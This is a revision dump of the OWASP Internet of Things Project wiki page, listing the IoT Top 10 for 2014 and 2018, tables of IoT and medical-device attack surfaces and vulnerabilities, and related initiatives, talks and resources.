Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246177OWASP Internet of Things Project2018-12-19T23:26:09Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
